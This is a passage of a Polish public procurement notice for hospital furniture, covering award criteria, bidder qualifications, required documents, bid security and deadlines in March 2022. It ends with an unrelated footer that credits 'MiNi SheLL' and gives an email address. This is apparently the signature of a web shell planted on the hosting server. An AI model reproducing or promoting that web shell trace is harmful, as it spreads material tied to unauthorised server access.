class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa, montaż i ustawienie przez Wykonawcę fabrycznie nowego łóżka szpitalnego z szafką i stolikiem. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 6.8 do SWZ<br/>Pozostałe warunki zostały określone w projektowanych postanowieniach umowy (zał. nr 7 do SWZ)<br/>Wymagania i warunki realizacji zamówienia: <br/>	realizacja przedmiotu zamówienia nastąpi w terminie zaoferowanym przez Wykonawcę, jednak nie później niż 90 dni kalendarzowych od dnia zawarcia umowy. Za dzień realizacji przedmiotu zamówienia uznany będzie dzień, w którym Wykonawca dostarczy, zmontuje i ustawi w miejscach wskazanych przez Zamawiającego przedmiot zamówienia (termin stanowi kryterium oceny ofert); <br/>	oferowane meble muszą być fabrycznie nowe i nieużywane. Nie mogą pochodzić z odzysku, nie mogą pochodzić z projektów realizowanych u innych klientów, nie mogą pochodzić z ekspozycji w punktach sprzedaży oraz muszą być wolne od jakichkolwiek wad fizycznych i prawnych czy roszczeń osób trzecich, muszą być wykonane z materiałów posiadających wszelkie wymagane prawem certyfikaty i aprobaty dopuszczające do sprzedaży i użytkowania na terenie Rzeczypospolitej Polskiej; <br/>	wymagane jest, aby meble zostały dostarczone do Zamawiającego wraz z rozładunkiem (wniesieniem do miejsca wskazanego przez Zamawiającego) i montażem. Przez montaż należy rozumieć: instalację kompletnych i gotowych do użycia mebli z uwzględnieniem ich dostosowania do pomieszczeń, w których będą użytkowane oraz do elementów znajdujących się w tych pomieszczeniach. Montaż będzie polegał w szczególności na: ustawieniu, wypoziomowaniu oraz ustawieniu w sposób zapewniający bezpieczeństwo podczas ich użytkowania poszczególnych elementów wyposażenia będących przedmiotem zamówienia; <br/>	Zamawiający wymaga, aby przedmiot zamówienia był wykonany starannie, z dużą dbałością o szczegóły i z materiałów opisanych w sposób szczegółowy w Opisie przedmiotu zamówienia. W celu zobrazowania walorów wizualnych i estetycznych koniecznych do osiągnięcia przez Wykonawcę, Zamawiający zamieścił w Opisie przedmiotu zamówienia rysunki poglądowe; <br/>	Wykonawca przed przystąpieniem do realizacji przedmiotu zamówienia zobowiązany będzie <br/>do skontaktowania się z Zamawiającym w celu uściślenia szczegółów w zakresie wykonania mebli, dokonania dokładnego pomiaru, uzgodnienia kolorów płyt meblowych i tapicerki. Wszelkie uwagi oraz wymagania Zamawiającego zgłoszone w ramach w/w zakresu Wykonawca będzie zobowiązany uwzględnić w trakcie realizacji przedmiotu zamówienia. Wybór zostanie dokonany na podstawie przedstawionych przez Wykonawcę próbników płyt oraz tkanin tapicerskich. Próbniki tkanin muszą posiadać atesty lub sprawozdania z badań potwierdzające skład oraz wymaganą wytrzymałość na ścieranie;<br/>	Wykonawca odpowiada za wszelkie wady prawne zaoferowanych i dostarczonych mebli, w tym również za ewentualne roszczenia osób trzecich wynikające z naruszenia praw własności intelektualnej lub przemysłowej, w tym praw autorskich, patentów, praw ochronnych na znaki towarowe oraz praw z rejestracji na wzory użytkowe i przemysłowe, pozostające w związku z wprowadzeniem mebli do obrotu na terytorium Rzeczypospolitej Polskiej; za ewentualne roszczenia osób trzecich wynikające z praw autorskich lub patentowych, dotyczące przedmiotu dostawy odpowiada wyłącznie Wykonawca; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33192000-2 - Meble medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru najkorzystniejszej oferty na podstawie<br/>kryteriów oceny ofert określonych w dokumentach zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia publicznego w niniejszym postępowaniu zgodnie z art. 112 ust. 1 pkt 2 ustawy Pzp mogą ubiegać się Wykonawcy, którzy spełniają określone przez Zamawiającego warunki udziału w postępowaniu, w następującym zakresie: <br/>1.1.	zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. <br/>1.2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów; <br/>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. <br/>1.3.	sytuacji ekonomicznej lub finansowej;<br/> Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. <br/>1.4.	zdolności technicznej lub zawodowej.<br/>Część 1 zamówienia: <br/>Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał w sposób należyty i prawidłowo co najmniej dwie dostawy polegająca na dostawie wraz z montażem mebli o wartości co najmniej 200 000,00 zł brutto każda. <br/>Przez wartość jednej dostawy wraz z montażem Zamawiający rozumie łączną wartość wykonywanych w/w prac w ramach jednej umowy. <br/>Zamawiający nie dopuszcza łączenia kilku dostaw w celu uzyskania ww. kwoty. <br/>Wartości pieniężne wskazane w dokumentach potwierdzających spełnienie warunku udziału w postepowaniu, podane w walutach innych niż PLN, Wykonawca przeliczy na złote polskie wg średniego kursu walut NBP obowiązującego w dniu podpisania kocowego protokołu odbioru robót lub inne równoważnego dokumentu. Jeżeli w tym dniu NBP nie opublikował informacji o średnim kursie walut, Zamawiający dokona odpowiednich przeliczeń wg średniego kursu z pierwszego, kolejnego dnia, w którym NBP opublikuje ww. informacje.<br/> Część 2-6 zamówienia:<br/> Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Dotyczy część 1 zamówienia<br/> wykaz dostaw wykonanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane (według wzoru określonego w załączniku nr 4 do SWZ) oraz załączeniem dowodów określających, czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane lub są wykonywane; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy. <br/> Część 2-6 zamówienia: nie dotyczy <br/>Zamawiający nie będzie żądał podmiotowych środków dowodowych na potwierdzenie braku podstaw do wykluczenia. <br/>W związku z ograniczoną liczbą znaków, dokumenty dotyczące podmiotów udostępniających zasoby, podwykonawców oraz wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający określił w rozdz. VI SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Oferta musi zawierać: wypełniony formularz oferty (Ofertę), który zostanie wygenerowany na Platformie, wypełniony i podpisany opis przedmiotu zamówienia (zał. 6.1 – 6.8 SWZ) oraz inne dokumenty i/lub oświadczenia wskazane w niniejszej SWZ jako konieczne do załączenia do Oferty, opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym przez osobę uprawnioną, zgodnie z formą reprezentacji Wykonawcy określoną w rejestrze sądowym lub innym dokumencie, właściwym dla danej formy organizacyjnej Wykonawcy, albo przez osobę umocowaną (na podstawie pełnomocnictwa) przez osoby uprawnione.<br/>2.	Wraz z Ofertą Wykonawca zobowiązany jest złożyć za pośrednictwem Platformy:<br/>- wypełniony i podpisany opisu przedmiotu zamówienia i podpisanego, który jest integralną częścią formularza Oferty (wygenerowanego przez Platformę), zgodnie ze wzorem stanowiącym załącznik:<br/>Załącznik 6.1 do SWZ – dot. części 1 zamówienia;<br/>Załącznik 6.2 do SWZ – dot. części 2 zamówienia;<br/>Załącznik 6.3 do SWZ – dot. części 3 zamówienia;<br/>Załącznik 6.4 do SWZ – dot. części 4 zamówienia;<br/>Załącznik 6.5 do SWZ– dot. części 5 zamówienia;<br/>Załącznik 6.6 do SWZ– dot. części 6 zamówienia;<br/>Załącznik 6.7 do SWZ– dot. części 7 zamówienia;<br/>Załącznik 6.8 do SWZ– dot. części 8 zamówienia.<br/><br/>Zamawiający wymaga, aby wypełniany opis przedmiotu zamówienia został opatrzony kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym przez osobę uprawnioną, zgodnie z formą reprezentacji Wykonawcy określoną w rejestrze sądowym lub innym dokumencie, właściwym dla danej formy organizacyjnej Wykonawcy, albo przez osobę umocowaną (na podstawie pełnomocnictwa) przez osoby uprawnione.<br/>Wypełniony opis przedmiotu zamówienia stanowi integralną część formularza „Oferta”. <br/>Opis przedmiotu zamówienia nie podlega uzupełnieniu.<br/><br/>3.	Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu w zakresie wskazanym przez Zamawiającego (zał. nr 1 i 2 do SWZ):<br/>4.	oświadczenie podmiotu udostępniającego zasoby dotyczące przesłanek wykluczenia z postępowania oraz spełnienia warunków udziału w postępowaniu, określonych przez Zamawiającego (zał. nr 1 i 2 do SWZ); <br/>5.	pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>6.	pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy (np. umowa o współdziałaniu). Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, o ile ofertę składają Wykonawcy wspólnie ubiegający się o zamówienia; <br/>7.	oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, z treści którego wynika, które roboty budowlane, dostawy lub usługi wykonują poszczególni Wykonawcy (zał. nr 3 do SWZ); <br/>8.	zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, o ile ofertę składa Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby (zał. nr 5 do SWZ);<br/>9.	gwarancję lub poręczenie – jeśli wadium jest wnoszone w formie innej niż pieniężnej<br/>10.	dokumenty, oświadczenia składane wraz z ofertą – określone w rozdz. VI SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Przystępując do procedury przetargowej Wykonawca jest obowiązany w terminie składania ofert, określonym w rozdz. XI ust 1, wnieść wadium na cały wymagany okres związania ofertą, w kwocie:<br/>Część 1 zamówienia: 4 000,00 zł (słownie: cztery tysiące 00/100 zł)<br/>Część 2 zamówienia: Zamawiający w ramach przedmiotowej części nie wymaga wniesienia wadium <br/>Część 3 zamówienia: Zamawiający w ramach przedmiotowej części nie wymaga wniesienia wadium <br/>Część 4 zamówienia: Zamawiający w ramach przedmiotowej części nie wymaga wniesienia wadium <br/> Część 5 zamówienia: Zamawiający w ramach przedmiotowej części nie wymaga wniesienia wadium <br/>Część 6 zamówienia: Zamawiający w ramach przedmiotowej części nie wymaga wniesienia wadium <br/>Część 7 zamówienia: Zamawiający w ramach przedmiotowej części nie wymaga wniesienia wadium <br/>Część 8 zamówienia: Zamawiający w ramach przedmiotowej części nie wymaga wniesienia wadium <br/>Więcej informacji zawiera rozdział IV SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. a) Zgodnie z art. 58 ust. 2 ustawy Pzp Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. b) W przypadku Wykonawców wspólnie ubiegających się o udzielnie zamówienia, żaden z nich,nie może podlegać wykluczeniu z postępowania z powodu przesłanek określonych w art. 108 ust. 1 ustawy Pzp. c) Warunki udziału w postępowaniu, o których mowa w pkt 1 powinien spełnić co najmniej jeden z Wykonawców samodzielnie lub wszyscy Wykonawcy łącznie. d) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy wspólnie ubiegające się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonują roboty budowlane, dostawy lub usługi, do realizacji których te zdolności są wymagane. e) W przypadku, o którym mowa w lit. d, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonują poszczególni Wykonawcy .2.Wspólnicy spółki cywilnej są traktowani jak Wykonawcy składający ofertę wspólnie <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający na podstawie art. 455 ust. 1 ustawy Prawo zamówień publicznych przewiduje<br/>możliwość zmiany zawartej umowy w przypadkach określonych w umowie, której projekt stanowi<br/>załącznik nr 7 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-29 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://upzzamosc.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-29 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-27</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Maksymalny termin wykonania zamówienia: 90 dni<br/>Minimalny okres gwarancji: 24 m.

Creat By MiNi SheLL
Email: jattceo@gmail.com